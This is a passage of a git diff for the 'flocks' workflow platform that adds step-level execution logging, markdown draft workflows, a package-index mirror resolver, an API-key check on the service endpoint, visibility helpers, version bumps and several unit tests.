+    """Persist legacy inline executionLog entries as append-only step rows."""
+    if not isinstance(execution_log, list):
+        return 0
+
+    written = 0
+    for step_index, step in enumerate(execution_log, start=1):
+        step_payload = compact_step_for_storage(step)
+        if not isinstance(step_payload, dict):
+            continue
+        try:
+            await Storage.write(workflow_execution_step_key(exec_id, step_index), step_payload)
+            written += 1
+        except Exception as exc:
+            log.warning("workflow.execution_step.backfill_failed", {
+                "exec_id": exec_id,
+                "step_index": step_index,
+                "error": str(exc),
+            })
+    return written
+
+
+async def load_execution_steps(
+    exec_id: str,
+    *,
+    offset: int = 0,
+    limit: Optional[int] = None,
+) -> Tuple[List[Dict[str, Any]], int]:
+    """Load persisted step logs for an execution, sorted by step key."""
+    page_limit = 500 if limit is None else max(limit, 0)
+    selected, total = await Storage.list_entries_page(
+        workflow_execution_step_prefix(exec_id),
+        offset=max(offset, 0),
+        limit=page_limit,
+    )
+    return [
+        value for _key, value in selected if isinstance(value, dict)
+    ], total
+
+
 def normalize_execution_status(status: str) -> str:
     """Map runner status values to API status values."""
     normalized = (status or "").strip().upper()
@@ -276,7 +495,7 @@ async def create_execution_record(
         input_params=compacted_params,
         exec_id=exec_id,
     )
-    await Storage.write(workflow_execution_key(exec_data["id"]), exec_data)
+    await Storage.write(workflow_execution_key(exec_data["id"]), compact_execution_summary(exec_data))
     return exec_data
 
 
@@ -286,16 +505,22 @@ async def record_execution_result(
     exec_data: Dict[str, Any],
 ) -> None:
     """Persist the final execution record, audit trail, and workflow stats."""
-    await Storage.write(workflow_execution_key(exec_id), exec_data)
+    summary_data = dict(exec_data)
+    backfilled_steps = await _backfill_execution_steps(exec_id, summary_data.get("executionLog"))
+    existing_step_count = _as_positive_int(summary_data.get("stepCount"))
+    if backfilled_steps and (existing_step_count is None or existing_step_count < backfilled_steps):
+        summary_data["stepCount"] = backfilled_steps
+
+    await Storage.write(workflow_execution_key(exec_id), compact_execution_summary(summary_data))
 
     # Update call/success/error counters so all trigger paths (HTTP, syslog, etc.)
     # are reflected in the UI stats panel.
-    status = exec_data.get("status", "error")
+    status = summary_data.get("status", "error")
     success = status == "success"
-    duration = exec_data.get("duration")
+    duration = summary_data.get("duration")
     if not isinstance(duration, (int, float)):
-        started_at = exec_data.get("startedAt", 0)
-        finished_at = exec_data.get("finishedAt", int(time.time() * 1000))
+        started_at = summary_data.get("startedAt", 0)
+        finished_at = summary_data.get("finishedAt", int(time.time() * 1000))
         duration = max(0.0, (finished_at - started_at) / 1000.0)
     await _update_workflow_stats(workflow_id, success, float(duration))
 
@@ -395,6 +620,9 @@ async def _trim_execution_history(workflow_id: str) -> None:
             try:
                 exec_id = key.rsplit("/", 1)[-1]
                 await Storage.remove(key)
+                step_rows = await Storage.list_raw(workflow_execution_step_prefix(exec_id))
+                for step_key, _value in step_rows:
+                    await Storage.remove(step_key)
                 record_path = Recorder.paths().workflow_dir / f"{exec_id}.jsonl"
                 await asyncio.to_thread(record_path.unlink, missing_ok=True)
             except Exception:
diff --git a/flocks/workflow/fs_store.py b/flocks/workflow/fs_store.py
index 366119faa..8f1900268 100644
--- a/flocks/workflow/fs_store.py
+++ b/flocks/workflow/fs_store.py
@@ -14,6 +14,68 @@
 log = Log.create(service="workflow.fs-store")
 
 _workspace_root: Optional[Path] = None
+_EMPTY_DRAFT_WORKFLOW_JSON: Dict[str, Any] = {
+    "start": "",
+    "nodes": [],
+    "edges": [],
+}
+
+
+def _markdown_title(markdown_content: Optional[str], fallback: str) -> str:
+    if not markdown_content:
+        return fallback
+    for line in markdown_content.splitlines():
+        stripped = line.strip()
+        if stripped.startswith("# "):
+            title = stripped[2:].strip()
+            if title:
+                return title
+    return fallback
+
+
+def _coerce_localized_names(value: Any) -> Dict[str, str]:
+    if not isinstance(value, dict):
+        return {}
+    names: Dict[str, str] = {}
+    for key, item in value.items():
+        locale = str(key).strip()
+        name = str(item).strip() if item is not None else ""
+        if locale and name:
+            names[locale] = name
+    return names
+
+
+def _localized_names_from_mapping(value: Any) -> Dict[str, str]:
+    if not isinstance(value, dict):
+        return {}
+
+    names: Dict[str, str] = {}
+    for key in ("nameI18n", "names", "localizedNames", "displayNames"):
+        names.update(_coerce_localized_names(value.get(key)))
+
+    direct_aliases = {
+        "zh-CN": ("nameZh", "nameCn", "zhName", "cnName"),
+        "en-US": ("nameEn", "enName"),
+    }
+    for locale, aliases in direct_aliases.items():
+        for alias in aliases:
+            direct = value.get(alias)
+            if isinstance(direct, str) and direct.strip():
+                names.setdefault(locale, direct.strip())
+                break
+    return names
+
+
+def _workflow_name_i18n(workflow_json: Dict[str, Any], meta: Dict[str, Any]) -> Dict[str, str]:
+    metadata = workflow_json.get("metadata")
+    names: Dict[str, str] = {}
+    for source in (
+        workflow_json,
+        metadata if isinstance(metadata, dict) else None,
+        meta,
+    ):
+        names.update(_localized_names_from_mapping(source))
+    return names
 
 
 def _is_cached_workspace_root_valid(current: Path, cached_root: Path) -> bool:
@@ -57,33 +119,48 @@ def read_workflow_dir(
 ) -> Optional[Dict[str, Any]]:
     """Read a single workflow directory and return metadata plus JSON."""
     json_file = wf_dir / "workflow.json"
-    if not json_file.is_file():
+    md_file = wf_dir / "workflow.md"
+    legacy_edit_md_file = wf_dir / "workflow.edit.md"
+    has_markdown = md_file.is_file() or legacy_edit_md_file.is_file()
+    if not json_file.is_file() and not has_markdown:
         return None
 
     try:
-        workflow_json = json.loads(json_file.read_text(encoding="utf-8"))
-        json_mtime_ms = int(json_file.stat().st_mtime * 1000)
+        if json_file.is_file():
+            workflow_json = json.loads(json_file.read_text(encoding="utf-8"))
+            json_mtime_ms = int(json_file.stat().st_mtime * 1000)
+        else:
+            workflow_json = dict(_EMPTY_DRAFT_WORKFLOW_JSON)
+            json_mtime_ms = 0
+
+        markdown_content: Optional[str] = None
+        updated_candidates = [json_mtime_ms]
+        if md_file.is_file():
+            markdown_content = md_file.read_text(encoding="utf-8")
+            updated_candidates.append(int(md_file.stat().st_mtime * 1000))
+        elif legacy_edit_md_file.is_file():
+            markdown_content = legacy_edit_md_file.read_text(encoding="utf-8")
+            updated_candidates.append(int(legacy_edit_md_file.stat().st_mtime * 1000))
 
         meta_file = wf_dir / "meta.json"
         if meta_file.is_file():
             meta = json.loads(meta_file.read_text(encoding="utf-8"))
         else:
+            fallback_updated = max(updated_candidates)
             meta = {
-                "name": workflow_json.get("name", workflow_id),
+                "name": workflow_json.get("name") or _markdown_title(markdown_content, workflow_id),
                 "description": workflow_json.get("description"),
                 "category": workflow_json.get("category", "default"),
-                "status": "active",
+                "status": "active" if json_file.is_file() else "draft",
                 "createdBy": None,
-                "createdAt": json_mtime_ms,
-                "updatedAt": json_mtime_ms,
+                "createdAt": fallback_updated,
+                "updatedAt": fallback_updated,
             }
 
-        md_file = wf_dir / "workflow.md"
-        markdown_content: Optional[str] = None
-        updated_candidates = [json_mtime_ms]
-        if md_file.is_file():
-            markdown_content = md_file.read_text(encoding="utf-8")
-            updated_candidates.append(int(md_file.stat().st_mtime * 1000))
+        name_i18n = _workflow_name_i18n(workflow_json, meta)
+        if name_i18n:
+            meta["nameI18n"] = name_i18n
+
         if meta_file.is_file():
             updated_candidates.append(int(meta_file.stat().st_mtime * 1000))
             updated_candidates.append(int(meta.get("updatedAt") or 0))
@@ -95,6 +172,7 @@ def read_workflow_dir(
             "source": source,
             "workflowJson": workflow_json,
             "markdownContent": markdown_content,
+            "editMarkdownContent": markdown_content,
         }
     except Exception as exc:
         log.warning(
@@ -154,7 +232,7 @@ def resolve_workflow_id_from_source(workflow: Any) -> Optional[str]:
         except ValueError:
             continue
         parts = relative.parts
-        if len(parts) == 2 and parts[1] == "workflow.json":
+        if len(parts) == 2 and parts[1] in {"workflow.json", "workflow.md", "workflow.edit.md"}:
             workflow_id = parts[0]
             if read_workflow_from_fs(workflow_id) is not None:
                 return workflow_id
diff --git a/flocks/workflow/poller_manager.py b/flocks/workflow/poller_manager.py
index 5238c9f20..923baf500 100644
--- a/flocks/workflow/poller_manager.py
+++ b/flocks/workflow/poller_manager.py
@@ -18,9 +18,9 @@
 from flocks.storage.storage import Storage
 from flocks.utils.log import Log
 from flocks.workflow.execution_store import (
-    compact_history_for_storage,
     compact_outputs_for_storage,
     create_execution_record,
+    ExecutionStepRecorder,
     record_execution_result,
     resolve_execution_outcome,
 )
@@ -415,6 +415,13 @@ async def _execute_run(
         inputs = self._build_inputs(config)
         exec_data = await create_execution_record(workflow_id, input_params=inputs)
         exec_id = str(exec_data["id"])
+        loop = asyncio.get_running_loop()
+        step_recorder = ExecutionStepRecorder(
+            exec_id=exec_id,
+            loop=loop,
+            logger=log,
+            log_event="poller.execution_step.write_failed",
+        )
         current = self._status.get(workflow_id) or self._base_status(workflow_id)
         current["lastRunAt"] = started_at_ms
         current["activeRuns"] = self._cleanup_done_runs(workflow_id)
@@ -428,6 +435,7 @@ async def _execute_run(
                 timeout_s=config["timeoutSeconds"],
                 trace=False,
                 cancel=cancel_event.is_set,
+                on_step_complete=step_recorder.on_step_complete,
             )
             if not isinstance(result, RunWorkflowResult):
                 result = RunWorkflowResult(status="failed", error="invalid_run_result")
@@ -438,16 +446,19 @@ async def _execute_run(
             duration_ms = _now_ms() - started_at_ms
             duration_s = max(0.0, time.time() - started_at_s)
             summary = self._summarize_outputs(result.outputs)
+            step_count = step_recorder.step_count or result.steps
+            exec_data.update(step_recorder.summary)
             exec_data.update({
                 "outputResults": compact_outputs_for_storage(result.outputs),
                 "status": status_value,
                 "finishedAt": _now_ms(),
                 "duration": duration_s,
-                "executionLog": compact_history_for_storage(result.history),
+                "executionLog": [],
                 "errorMessage": error_message,
+                "stepCount": step_count,
                 "currentNodeId": result.last_node_id,
                 "currentPhase": status_value,
-                "currentStepIndex": result.steps,
+                "currentStepIndex": step_count,
                 "triggerId": "schedule-default",
                 "triggerType": "schedule",
                 "deliveryId": inputs.get("_flocks", {}).get("trigger", {}).get("deliveryId"),
@@ -471,12 +482,13 @@ async def _execute_run(
             duration_s = max(0.0, time.time() - started_at_s)
             status_value = "cancelled" if cancel_event.is_set() else "error"
             finished_at_ms = _now_ms()
+            exec_data.update(step_recorder.summary)
             exec_data.update({
                 "status": status_value,
                 "finishedAt": finished_at_ms,
                 "duration": duration_s,
                 "errorMessage": str(exc),
-                "executionLog": compact_history_for_storage(exec_data.get("executionLog")),
+                "executionLog": [],
                 "currentPhase": status_value,
                 "triggerId": "schedule-default",
                 "triggerType": "schedule",
diff --git a/flocks/workflow/requirements.py b/flocks/workflow/requirements.py
index e951fb8c4..a640be68f 100644
--- a/flocks/workflow/requirements.py
+++ b/flocks/workflow/requirements.py
@@ -12,6 +12,8 @@
 from pathlib import Path
 from typing import Any, Dict, Iterable, List, Optional, Sequence
 
+_CN_PYPI_INDEX_URL = "https://mirrors.aliyun.com/pypi/simple"
+
 
 def _default_cache_dir() -> Path:
     raw = os.getenv("FLOCKS_WORKFLOW_REQUIREMENTS_CACHE_DIR")
@@ -30,6 +32,40 @@ def _normalize_requirements(reqs: Iterable[str]) -> List[str]:
     return sorted(out)
 
 
+def _is_cn_region(value: Optional[str]) -> bool:
+    normalized = (value or "").strip().lower().replace("_", "-")
+    return normalized in {"cn", "china", "zh", "zh-cn"}
+
+
+def _is_zh_locale(value: Optional[str]) -> bool:
+    normalized = (value or "").strip().lower().replace("_", "-")
+    return normalized.startswith("zh")
+
+
+def resolve_python_package_index_url() -> Optional[str]:
+    """Return the preferred Python package index for workflow installs."""
+    for env_name in (
+        "FLOCKS_WORKFLOW_SERVICE_PIP_INDEX_URL",
+        "FLOCKS_WORKFLOW_REQUIREMENTS_PIP_INDEX_URL",
+        "PIP_INDEX_URL",
+        "UV_INDEX_URL",
+        "UV_DEFAULT_INDEX",
+        "FLOCKS_UV_DEFAULT_INDEX",
+    ):
+        value = os.getenv(env_name)
+        if value and value.strip():
+            return value.strip()
+
+    if _is_cn_region(os.getenv("FLOCKS_UPDATE_REGION")):
+        return _CN_PYPI_INDEX_URL
+    if _is_cn_region(os.getenv("FLOCKS_INSTALL_LANGUAGE")):
+        return _CN_PYPI_INDEX_URL
+    for env_name in ("LANGUAGE", "LC_ALL", "LANG"):
+        if _is_zh_locale(os.getenv(env_name)):
+            return _CN_PYPI_INDEX_URL
+    return None
+
+
 def requirements_cache_key(requirements: Sequence[str], *, python_executable: Optional[str] = None) -> str:
     py = (python_executable or sys.executable or "").strip()
     norm = _normalize_requirements(requirements)
@@ -56,6 +92,7 @@ def requirements_from_workflow_metadata(metadata: Optional[Dict[str, Any]]) -> L
 class RequirementsInstaller:
     installer: str = "auto"
     cache_dir: Path = None  # type: ignore[assignment]
+    index_url: Optional[str] = None
 
     def __post_init__(self) -> None:
         object.__setattr__(self, "cache_dir", self.cache_dir or _default_cache_dir())
@@ -79,10 +116,13 @@ def ensure_installed(self, requirements: Sequence[str]) -> bool:
         if marker.exists():
             return False
         which = self._select_installer()
+        index_url = self.index_url or resolve_python_package_index_url()
+        index_args = ["--default-index", index_url] if index_url else []
         if which == "uv":
-            cmd = ["uv", "pip", "install", "--python", sys.executable, *reqs]
+            cmd = ["uv", "pip", "install", "--python", sys.executable, *index_args, *reqs]
         else:
-            cmd = [sys.executable, "-m", "pip", "install", *reqs]
+            pip_index_args = ["--index-url", index_url] if index_url else []
+            cmd = [sys.executable, "-m", "pip", "install", *pip_index_args, *reqs]
         subprocess.run(cmd, check=True)
         marker.write_text("\n".join(reqs) + "\n", encoding="utf-8")
         return True
@@ -96,6 +136,7 @@ class SandboxRequirementsInstaller:
     python_executable: str = "python3"
     marker_root: str = "/workspace/.flocks/workflow/requirements"
     site_packages_dir: str = "/workspace/.flocks/workflow/site-packages"
+    index_url: Optional[str] = None
 
     def _select_installer(self) -> str:
         v = (self.installer or "auto").strip().lower()
@@ -165,7 +206,9 @@ def ensure_installed(self, requirements: Sequence[str], sandbox: Dict[str, Any])
         subprocess.run(mkdir_cmd, check=True)
 
         which = self._select_installer()
+        index_url = self.index_url or resolve_python_package_index_url()
         if which == "uv":
+            index_args = ["--default-index", index_url] if index_url else []
             install_cmd = [
                 *base_cmd,
                 "uv",
@@ -175,9 +218,11 @@ def ensure_installed(self, requirements: Sequence[str], sandbox: Dict[str, Any])
                 py,
                 "--target",
                 self.site_packages_dir,
+                *index_args,
                 *reqs,
             ]
         else:
+            index_args = ["--index-url", index_url] if index_url else []
             install_cmd = [
                 *base_cmd,
                 py,
@@ -188,6 +233,7 @@ def ensure_installed(self, requirements: Sequence[str], sandbox: Dict[str, Any])
                 "--no-cache-dir",
                 "--target",
                 self.site_packages_dir,
+                *index_args,
                 *reqs,
             ]
         subprocess.run(install_cmd, check=True)
diff --git a/flocks/workflow/runner.py b/flocks/workflow/runner.py
index 3d9dcc650..51f27a48d 100644
--- a/flocks/workflow/runner.py
+++ b/flocks/workflow/runner.py
@@ -296,8 +296,9 @@ def run_workflow(
     on_step_start: Optional[Any] = None,
     on_step_complete: Optional[Any] = None,
     max_parallel_workers: int = 4,
-    history_mode: Literal["full", "summary"] = "full",
+    history_mode: Literal["full", "summary"] = "summary",
     cancel: Optional[Callable[[], bool]] = None,
+    retain_history: bool = False,
 ) -> RunWorkflowResult:
     # 确保日志已配置
     _ensure_logging_configured()
@@ -465,6 +466,7 @@ def _on_step_end(_token, step_result):
             cancel=cancel,
             on_step_start=_on_step_start,
             on_step_end=_on_step_end,
+            retain_history=retain_history,
         )
     except FlocksWorkflowError as e:
         # Extract execution context from error if available
@@ -495,8 +497,8 @@ def _on_step_end(_token, step_result):
             history=history_from_error,
         )
 
-    history = [s.model_dump(mode="json") for s in result.history]
-    last_outputs = result.outputs if result.outputs else (result.history[-1].outputs if result.history else {})
+    history = [s.model_dump(mode="json") for s in result.history] if result.history else []
+    last_outputs = result.outputs if result.outputs else {}
 
     if cancel is not None and cancel():
         return RunWorkflowResult(
diff --git a/flocks/workflow/service_runtime.py b/flocks/workflow/service_runtime.py
index 1b89edeed..3590342fb 100644
--- a/flocks/workflow/service_runtime.py
+++ b/flocks/workflow/service_runtime.py
@@ -4,12 +4,14 @@
 
 import argparse
 import asyncio
+import hmac
 import json
+import os
 import time
 from contextlib import asynccontextmanager
 from typing import Any, Dict, Optional
 
-from fastapi import FastAPI, HTTPException
+from fastapi import FastAPI, Header, HTTPException
 from fastapi.responses import JSONResponse
 from pydantic import BaseModel, Field
 
@@ -19,6 +21,7 @@
 from flocks.workflow.tool_context import build_workflow_tool_context
 
 log = Log.create(service="workflow.service_runtime")
+_SERVICE_API_KEY_ENV = "FLOCKS_WORKFLOW_SERVICE_API_KEY"
 
 
 class InvokeRequest(BaseModel):
@@ -36,6 +39,7 @@ def create_service_app(
     workflow_json: Dict[str, Any],
     workflow_id: str,
     release_id: str,
+    api_key: Optional[str] = None,
 ) -> FastAPI:
     """Build service app bound to one workflow snapshot."""
     @asynccontextmanager
@@ -61,6 +65,7 @@ async def lifespan(_app: FastAPI):
     app.state.workflow_json = workflow_json
     app.state.workflow_id = workflow_id
     app.state.release_id = release_id
+    app.state.api_key = api_key
 
     @app.get("/health")
     async def health() -> Dict[str, Any]:
@@ -76,8 +81,17 @@ async def health() -> Dict[str, Any]:
         return JSONResponse(status_code=503, content=payload)
 
     @app.post("/invoke")
-    async def invoke(req: InvokeRequest) -> Dict[str, Any]:
+    async def invoke(
+        req: InvokeRequest,
+        x_api_key: Optional[str] = Header(default=None, alias="x-api-key"),
+    ) -> Dict[str, Any]:
         started = time.time()
+        expected_api_key = app.state.api_key
+        if expected_api_key and (
+            not x_api_key or not hmac.compare_digest(str(x_api_key), str(expected_api_key))
+        ):
+            raise HTTPException(status_code=401, detail="Invalid API key")
+
         if not app.state.mcp_ready:
             raise HTTPException(
                 status_code=503,
@@ -150,6 +164,7 @@ def main() -> None:
         workflow_json=workflow_json,
         workflow_id=args.workflow_id,
         release_id=args.release_id,
+        api_key=os.getenv(_SERVICE_API_KEY_ENV),
     )
 
     import uvicorn
diff --git a/flocks/workflow/visibility.py b/flocks/workflow/visibility.py
new file mode 100644
index 000000000..ca037d773
--- /dev/null
+++ b/flocks/workflow/visibility.py
@@ -0,0 +1,71 @@
+"""Visibility helpers for filesystem-backed workflow definitions."""
+
+from __future__ import annotations
+
+from typing import Any, Mapping
+
+_TRUE_STRINGS = {"1", "true", "yes", "on"}
+_HIDDEN_VISIBILITIES = {"hidden", "internal", "private", "template"}
+
+
+def _truthy(value: Any) -> bool:
+    if isinstance(value, bool):
+        return value
+    if isinstance(value, str):
+        return value.strip().lower() in _TRUE_STRINGS
+    return False
+
+
+def _string_value(value: Any) -> str:
+    return value.strip().lower() if isinstance(value, str) else ""
+
+
+def is_hidden_workflow_meta(meta: Mapping[str, Any] | None) -> bool:
+    """Return True when workflow metadata marks a definition as non-discoverable."""
+    if not isinstance(meta, Mapping):
+        return False
+
+    flag_keys = (
+        "hidden",
+        "templateOnly",
+        "internal",
+        "excludeFromUI",
+        "excludeFromPrompt",
+    )
+    if any(_truthy(meta.get(key)) for key in flag_keys):
+        return True
+
+    if _string_value(meta.get("visibility")) in _HIDDEN_VISIBILITIES:
+        return True
+    if _string_value(meta.get("status")) == "hidden":
+        return True
+
+    return False
+
+
+def is_hidden_workflow(
+    workflow_json: Mapping[str, Any] | None = None,
+    meta: Mapping[str, Any] | None = None,
+) -> bool:
+    """Return True when a workflow should be hidden from UI and prompt scans."""
+    if is_hidden_workflow_meta(meta):
+        return True
+    if not isinstance(workflow_json, Mapping):
+        return False
+
+    if is_hidden_workflow_meta(workflow_json):
+        return True
+
+    metadata = workflow_json.get("metadata")
+    return is_hidden_workflow_meta(metadata if isinstance(metadata, Mapping) else None)
+
+
+def is_hidden_workflow_data(data: Mapping[str, Any] | None) -> bool:
+    """Return True when data returned by read_workflow_dir() is hidden."""
+    if not isinstance(data, Mapping):
+        return False
+    workflow_json = data.get("workflowJson")
+    return is_hidden_workflow(
+        workflow_json if isinstance(workflow_json, Mapping) else None,
+        data,
+    )
diff --git a/pyproject.toml b/pyproject.toml
index f54edb8ef..821861848 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
 [project]
 name = "flocks"
-version = "v2026.6.10"
+version = "v2026.6.17"
 description = "AI-Native SecOps platform with multi-agent collaboration"
 authors = [
     {name = "Flocks Team", email = "team@example.com"}
@@ -33,9 +33,9 @@ dependencies = [
     # CLI & Terminal UI
     "click>=8.1.7",
     "rich>=13.7.0",
-    "typer>=0.9.0",
+    "typer>=0.9.0,<0.24.0",
     # AI & LLM
-    "litellm>=1.30.0",
+    "litellm==1.83.7",
     "anthropic>=0.86.0",
     "openai>=1.12.0",
     "google-genai>=0.3.0",
diff --git a/tests/acp/test_agent_command_arguments.py b/tests/acp/test_agent_command_arguments.py
new file mode 100644
index 000000000..f01d81023
--- /dev/null
+++ b/tests/acp/test_agent_command_arguments.py
@@ -0,0 +1,148 @@
+from __future__ import annotations
+
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.acp.agent import ACPAgent
+from flocks.acp.types import ACPConfig
+
+
+class _DummySessionManager:
+    def __init__(self, state):
+        self._state = state
+
+    def get(self, session_id: str):
+        assert session_id == self._state.id
+        return self._state
+
+    def set_model(self, session_id: str, model):
+        assert session_id == self._state.id
+        self._state.model = model
+
+
+@pytest.mark.asyncio
+async def test_prompt_command_parses_json_arguments_for_acp():
+    session_state = SimpleNamespace(
+        id="ses_acp_json",
+        cwd="/tmp/project",
+        model=None,
+        mode_id="rex",
+    )
+    sdk = SimpleNamespace(
+        session=SimpleNamespace(
+            prompt=AsyncMock(),
+            command=AsyncMock(),
+        )
+    )
+    agent = ACPAgent(SimpleNamespace(), ACPConfig(sdk=sdk))
+    agent._session_manager = _DummySessionManager(session_state)
+    agent._get_default_model = AsyncMock(
+        return_value={"providerID": "anthropic", "modelID": "claude-test"}
+    )
+
+    with patch(
+        "flocks.agent.registry.Agent.default_agent",
+        new=AsyncMock(return_value="rex"),
+    ):
+        result = await agent.prompt(
+            {
+                "sessionId": "ses_acp_json",
+                "prompt": [{"type": "text", "text": '/bug {"scope":"acp","retry":1}'}],
+            }
+        )
+
+    assert result == {"stopReason": "end_turn", "_meta": {}}
+    sdk.session.prompt.assert_not_called()
+    sdk.session.command.assert_awaited_once_with(
+        session_id="ses_acp_json",
+        command="bug",
+        arguments='{"scope":"acp","retry":1}',
+        arguments_json={"scope": "acp", "retry": 1},
+        model="anthropic/claude-test",
+        agent="rex",
+        directory="/tmp/project",
+    )
+
+
+@pytest.mark.asyncio
+async def test_prompt_command_keeps_legacy_string_arguments_when_not_json():
+    session_state = SimpleNamespace(
+        id="ses_acp_string",
+        cwd="/tmp/project",
+        model={"providerID": "anthropic", "modelID": "claude-test"},
+        mode_id="rex",
+    )
+    sdk = SimpleNamespace(
+        session=SimpleNamespace(
+            prompt=AsyncMock(),
+            command=AsyncMock(),
+        )
+    )
+    agent = ACPAgent(SimpleNamespace(), ACPConfig(sdk=sdk))
+    agent._session_manager = _DummySessionManager(session_state)
+
+    with patch(
+        "flocks.agent.registry.Agent.default_agent",
+        new=AsyncMock(return_value="rex"),
+    ):
+        result = await agent.prompt(
+            {
+                "sessionId": "ses_acp_string",
+                "prompt": [{"type": "text", "text": "/bug investigate routing"}],
+            }
+        )
+
+    assert result == {"stopReason": "end_turn", "_meta": {}}
+    sdk.session.prompt.assert_not_called()
+    sdk.session.command.assert_awaited_once_with(
+        session_id="ses_acp_string",
+        command="bug",
+        arguments="investigate routing",
+        model="anthropic/claude-test",
+        agent="rex",
+        directory="/tmp/project",
+        arguments_json=None,
+    )
+
+
+@pytest.mark.asyncio
+async def test_prompt_command_falls_back_when_json_parse_fails():
+    session_state = SimpleNamespace(
+        id="ses_acp_invalid_json",
+        cwd="/tmp/project",
+        model={"providerID": "anthropic", "modelID": "claude-test"},
+        mode_id="rex",
+    )
+    sdk = SimpleNamespace(
+        session=SimpleNamespace(
+            prompt=AsyncMock(),
+            command=AsyncMock(),
+        )
+    )
+    agent = ACPAgent(SimpleNamespace(), ACPConfig(sdk=sdk))
+    agent._session_manager = _DummySessionManager(session_state)
+
+    with patch(
+        "flocks.agent.registry.Agent.default_agent",
+        new=AsyncMock(return_value="rex"),
+    ):
+        result = await agent.prompt(
+            {
+                "sessionId": "ses_acp_invalid_json",
+                "prompt": [{"type": "text", "text": '/bug {"scope":'}],
+            }
+        )
+
+    assert result == {"stopReason": "end_turn", "_meta": {}}
+    sdk.session.prompt.assert_not_called()
+    sdk.session.command.assert_awaited_once_with(
+        session_id="ses_acp_invalid_json",
+        command="bug",
+        arguments='{"scope":',
+        model="anthropic/claude-test",
+        agent="rex",
+        directory="/tmp/project",
+        arguments_json=None,
+    )
diff --git a/tests/agent/test_unified_session_loop.py b/tests/agent/test_unified_session_loop.py
index 852330586..255882ccd 100644
--- a/tests/agent/test_unified_session_loop.py
+++ b/tests/agent/test_unified_session_loop.py
@@ -280,3 +280,62 @@ async def test_process_session_message_pins_explicit_request_model(self, monkeyp
             model="claude-sonnet-4-5",
             model_pinned=True,
         )
+
+    @pytest.mark.asyncio
+    async def test_display_text_does_not_replace_model_prompt(self, monkeypatch):
+        """displayText is presentation metadata; the stored text remains the real prompt."""
+        from types import SimpleNamespace
+        from flocks.server.routes import session as session_routes
+
+        request = session_routes.PromptRequest(
+            parts=[{"type": "text", "text": "Read guide.md and configure the workflow."}],
+            displayText="@@flocks-instruction:智能配置",
+            noReply=True,
+        )
+        session = SimpleNamespace(
+            id="ses_test",
+            project_id="proj",
+            directory="/tmp/project",
+            agent="rex",
+            provider=None,
+            model=None,
+            model_pinned=False,
+        )
+
+        monkeypatch.setattr(
+            "flocks.agent.registry.Agent.default_agent",
+            AsyncMock(return_value="rex"),
+        )
+        monkeypatch.setattr(
+            "flocks.agent.registry.Agent.get",
+            AsyncMock(return_value=SimpleNamespace(name="rex", model=None)),
+        )
+        monkeypatch.setattr("flocks.session.session.Session.update", AsyncMock())
+        monkeypatch.setattr("flocks.provider.provider.Provider._ensure_initialized", lambda: None)
+        monkeypatch.setattr("flocks.provider.provider.Provider.apply_config", AsyncMock())
+        monkeypatch.setattr("flocks.provider.provider.Provider.get", lambda _provider_id: object())
+        monkeypatch.setattr("flocks.config.config.Config.get", AsyncMock(return_value=SimpleNamespace()))
+        monkeypatch.setattr("flocks.tool.registry.ToolRegistry.init", lambda: None)
+        monkeypatch.setattr(
+            "flocks.session.lifecycle.revert.SessionRevert.cleanup",
+            AsyncMock(),
+        )
+        message_create = AsyncMock(return_value=SimpleNamespace(id="msg_user_1"))
+        publish_event = AsyncMock()
+        monkeypatch.setattr("flocks.session.message.Message.create", message_create)
+        monkeypatch.setattr("flocks.server.routes.event.publish_event", publish_event)
+
+        await session_routes._process_session_message(
+            "ses_test",
+            session,
+            request,
+            "/tmp/project",
+        )
+
+        create_kwargs = message_create.await_args.kwargs
+        assert create_kwargs["content"] == "Read guide.md and configure the workflow."
+        assert create_kwargs["part_metadata"] == {"displayText": "@@flocks-instruction:智能配置"}
+
+        part_event = publish_event.await_args_list[1].args[1]["part"]
+        assert part_event["text"] == "Read guide.md and configure the workflow."
+        assert part_event["metadata"] == {"displayText": "@@flocks-instruction:智能配置"}
diff --git a/tests/channel/test_channel.py b/tests/channel/test_channel.py
index 098606aab..065325060 100644
--- a/tests/channel/test_channel.py
+++ b/tests/channel/test_channel.py
@@ -839,6 +839,55 @@ async def test_append_user_message_stores_feishu_media_part(self, monkeypatch):
         assert stored_part.mime == "image/png"
         assert stored_part.url == "file:///tmp/diagram.png"
 
+    @pytest.mark.asyncio
+    async def test_append_user_message_accepts_windows_file_uri(self, monkeypatch):
+        from flocks.channel.inbound.dispatcher import InboundDispatcher
+        from flocks.config.config import ChannelConfig
+
+        created_message = SimpleNamespace(id="message_user_1")
+        store_part = AsyncMock()
+        paths_checked: list[str] = []
+
+        def fake_isfile(path: str) -> bool:
+            paths_checked.append(path)
+            return path == "C:/Users/demo/Pictures/channel image.png"
+
+        monkeypatch.setattr(
+            "flocks.session.message.Message.create",
+            AsyncMock(return_value=created_message),
+        )
+        monkeypatch.setattr(
+            "flocks.session.message.Message.store_part",
+            store_part,
+        )
+        monkeypatch.setattr(
+            "flocks.session.message.Message.parts",
+            AsyncMock(return_value=[]),
+        )
+        monkeypatch.setattr("os.path.isfile", fake_isfile)
+
+        await InboundDispatcher._append_user_message(
+            "session_1",
+            "[图片消息]",
+            InboundMessage(
+                channel_id="weixin",
+                account_id="default",
+                message_id="msg_1",
+                sender_id="user_1",
+                chat_type=ChatType.DIRECT,
+                media_url="file:///C:/Users/demo/Pictures/channel%20image.png",
+                media_mime="image/png",
+            ),
+            ChannelConfig(enabled=True),
+        )
+
+        assert paths_checked == ["C:/Users/demo/Pictures/channel image.png"]
+        store_part.assert_awaited_once()
+        stored_part = store_part.await_args.args[2]
+        assert stored_part.type == "file"
+        assert stored_part.filename == "channel image.png"
+        assert stored_part.mime == "image/png"
+
 
 class TestMultimodalInput:
     @pytest.mark.asyncio
diff --git a/tests/channel/test_dingtalk.py b/tests/channel/test_dingtalk.py
index a258df189..60c9d64a8 100644
--- a/tests/channel/test_dingtalk.py
+++ b/tests/channel/test_dingtalk.py
@@ -13,6 +13,8 @@
 import contextlib
 import importlib.util
 import json
+import threading
+import time
 from pathlib import Path
 from types import SimpleNamespace
 from unittest.mock import AsyncMock, patch
@@ -369,6 +371,16 @@ def test_validate_config_rejects_missing_credentials(self):
         assert error is not None
         assert "appKey" in error or "credentials" in error.lower()
 
+    def test_validate_config_rejects_dingtalk_prefixed_client_id(self):
+        from flocks.channel.builtin.dingtalk import DingTalkChannel
+        plugin = DingTalkChannel()
+        error = plugin.validate_config({
